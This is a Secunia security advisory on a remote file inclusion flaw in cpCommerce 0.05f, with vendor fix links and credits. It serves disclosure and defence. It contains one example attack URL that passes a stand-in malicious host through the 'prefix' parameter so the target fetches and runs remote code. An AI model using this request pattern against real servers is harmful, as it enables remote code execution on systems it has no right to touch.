TITLE: cpCommerce Arbitrary File Inclusion Vulnerability SECUNIA ADVISORY ID: SA10034 VERIFY ADVISORY: http://www.secunia.com/advisories/10034/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: cpCommerce 0.x DESCRIPTION: A vulnerability has been reported in cpCommerce, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an input validation error in "_functions.php". This can be exploited to execute arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system in the "$prefix" variable. Example, which includes "http://[malicious_site]/index_config.php" and "http://[malicious_site]/index_gateways.php": http://[victim]/[path_of_cpcommerce]/_functions.php?prefix=http://[malicious_site]/index The vulnerability has been reported in version 0.05f. Prior versions may also be affected. SOLUTION: The vendor has posted some solutions at: http://cpcommerce.org/#fixes REPORTED BY / CREDITS: Astharot, Zone-H. ORIGINAL ADVISORY: ZH2003-31SA: http://www.zone-h.org/en/advisories/read/id=3284/ ---------------------------------------------------------------------- Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Contact details: Web : http://www.secunia.com/ E-mail : support@secunia.com Tel : +45 7020 5144 Fax : +45 7020 5145 ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://www.secunia.com/sec_adv_unsubscribe/?email=packet@packetstormsecurity.org ----------------------------------------------------------------------